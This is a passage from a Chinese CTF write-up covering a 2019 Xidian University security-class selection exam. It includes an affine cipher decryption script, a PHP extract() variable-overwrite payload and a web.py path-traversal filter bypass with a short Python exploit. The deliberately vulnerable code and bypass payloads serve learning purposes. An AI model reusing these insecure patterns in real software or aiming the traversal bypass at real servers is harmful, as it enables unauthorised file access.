2019西电网安实验班选拔考试
1.FirstBlood
<div id="myInfo"class="reveal-modal" style="display: none;"> <h2>我的信息</h2> <blockquote> <p>队伍名称:测试用户</p> <p>口号:FirstBl00d</p> <!-- index.php/user/updatevoice?voice= --> <p>分数: 300</p> <p>已找到的FLAG: 3</p> </blockquote> <a class="close-reveal-modal">×</a> </div>
访问url/index.php/user/updatevoice?voice=FirstBlood
2.十六进制字符串
打开题目,提示:
#coding=utf-8 #求最大公约数 def egcd(a, b): if a == 0: return (b, 0, 1)else: g, y, x = egcd(b % a, a)return (g, x - (b // a) * y, y)#求模逆元素 def modinv(a, m): g, x, y = egcd(a, m) if g != 1: raise Exception('modular inverse does not exist') else: return x % m#欧拉函数 def eular(n): count = 0 for x in xrange(0,n): g,x,y = egcd(x,n) if g == 1:count = count + 1 return count # 仿射密码 def Affine_cipher(ciphertext,a,b): plantext = ''# 求逆元fa = modinv(a,26) for x in ciphertext: if x == ' ': plantext += ' 'continue plantext += chr(ord('a')+((ord(x)-b)-ord('a'))*fa%26) return plantext
调用key得出明文
4.变量覆盖
<?php $filename = 'x'; extract($_GET); if(!empty($attempt)) {$conbination = trim(file_get_contents($filename));if ($attempt === $conbination){echo "<p>neirong" . "$conbination!?</p>";require("flag.php");echo "<p>congratulation,key is:" . "$flag<p>";} else{echo "<p>Incorrenr!</p>";} } ?>
payload:url?attempy=&filename=flag.php
5.web.py
def GET(self,filepath):if filepath.find("flag")>-1:return "Hacker"filepath = filepath.replace("../","")try:with open("./uploads/%s" % filepath,"rb") as f:content = f.read()return contentexcept:return web.notfound("Sorry,the file you were looking for was not found.")
exp:
from requests import getdef get_flag():url = ""payload = url + ".../...//.../...//fla../g.txt"flag = get(payload).contentreturn flagif __name__ == "__main__":flag = get_flag()print "[x] flag :" +flag
转载于:https://www.cnblogs.com/sylover/p/11299295.html
2019西电网安实验班选拔考试相关推荐
- 【CTF题解NO.00001】西安电子科技大学网络与信息安全学院2020年网络空间安全专业实验班选拔考试 - write up by arttnba3
[CTF题解NO.00001]西安电子科技大学网络与信息安全学院2020年网络空间安全专业实验班选拔考试 - write up by arttnba3 0x00.绪论 0x01.PWN (AK) cm ...
- 西电网安专硕考研分享
大家好,我来自双非一本,本科专业信息安全,报考的是西安电子科技大学杭州研究院的网络空间安全的专硕.初试科目:政治,数学一,英语一,953(数据结构,计算机网络,密码学). 从择校信息收集.各阶段复习进 ...
- 第70届(2019)IMO中国国家队选拔考试试题
(几何除外) 1,几何,略 2,给定n≥3,是否存在无穷个2n元集{a1,...,an,b1,...,bn}满足其中元素整体互素,a1,...,an成等差数列,b1,...,bn也成等差数列. 3,给 ...
- 【2019西电网信杯】线上赛部分题wp
因为太菜了所以才打了全国第九... 不过半小时AK了crypto是真的[呲牙] Dawn_whisper_解题报告 MISC 调查问卷 随便填一填就能搞到flag了- HiddenImage Look ...
- 广东电网计算机考试,考点爆料!2019广东电网计算机专业居然考这些!
原标题:考点爆料!2019广东电网计算机专业居然考这些! 本文由广东中公国企为您整理:2019广东电网校园招聘预计于2018年10~11月份开启,计算机类也是其中一个招聘大类,那么2019广东电网校园 ...
- 国家电网计算机专业考试科目,2019国家电网考试科目:你的专业都考什么?
原标题:2019国家电网考试科目:你的专业都考什么? 国家电网考试科目每年是由国家电网人才招聘网站发布的.国家电网考试大纲已于10月中旬发布,而马上你们就要迎来考试了,所以小奕已经把2019国家电网考 ...
- 国家电网计算机考试分值,2019国家电网考试考什么题型?分值多少?范围是什么?...
原标题:2019国家电网考试考什么题型?分值多少?范围是什么? 国网电气考情: 一.单选:100题 30道企业文化+能源战略+行测 企业文化+能源战略:行测是1:1 行测包含:1道病句,1道逻辑填空, ...
- 国家电网职称计算机考试分值,2019国家电网考试题型、分值和范围
原标题:2019国家电网考试题型.分值和范围 国网电气考情: 一.单选:100题 30道企业文化+能源战略+行测 企业文化+能源战略:行测是1:1 行测包含:1道病句,1道逻辑填空,1道阅读,1道数字 ...
- 山西2019数据结构专升本_山西省2017年专升本选拔考试(C程序设计数据结构)历年真题详解...
山西省2017年专升本选拔考试(C程序设计数据结构)历年真题详解 说明:本试题分C程序设计和数据结构(C语言版)两部分,各占100分,满分200分,考试时间150分钟. 第一部分C程序设计 一.单项选 ...
最新文章
- Win/Linux常用命令
- PPT|工业互联网关键技术专利态势
- python如何实现别人调用自己的API
- [CQOI2014]和谐矩阵
- python selenium unittest_python+selenium+unittest单元测试框架
- Cache-Control常用类型
- linux编程课后作业,Unix/Linux 编程实践教程第三章习题
- 招博后,比利时鲁汶大学 A2H 部计算机视觉动物行为分析方向
- 生产计划管理制造系统模块化
- oracle数组的使用
- 并发设计模式之Guarded Suspension模式
- GD32F450以太网(1):ETH 外设接口简介
- 如果这篇文章说不清epoll的本质,那就过来掐死我吧! (2)
- LayoutInflater中的inflate方法详解(转载整理)
- 2021-02-03-隐藏Tomcat版本号
- 数据结构:通过hash表方法创建母猪信息录入系统
- 行锁、间隙锁、next-key锁
- 华为账号登录的手游如何在雷电(MuMu等)模拟器上登录游戏(以三国杀为例)
- Miscellaneous
- ps批量修改名片文字_怎么修改图片上的文字 修改图片文字比如名片图片上面的地址需要修改下...
热门文章
- Python入门-前言
- 《Java编码指南:编写安全可靠程序的75条建议》—— 指南19:对细粒度的安全定义自定义安全权限...
- Android平台网络模式的修改
- django安装与简介
- 【吼吼睡cocos2d学习笔记】第五章 - loading场景以及其他
- citrix 产品上线
- python方法大全参数是对象_向对象方法Python传递太多参数
- python非零返回怎么解决_Python:从命令行获取输出,该命令行以非零退出代码退出...
- mysql8和php7不能连接_php无法连接mysql8.x
- linux mysql删除用户权限_linuxmysql增加用户,删除用户,以及用户权限_MySQL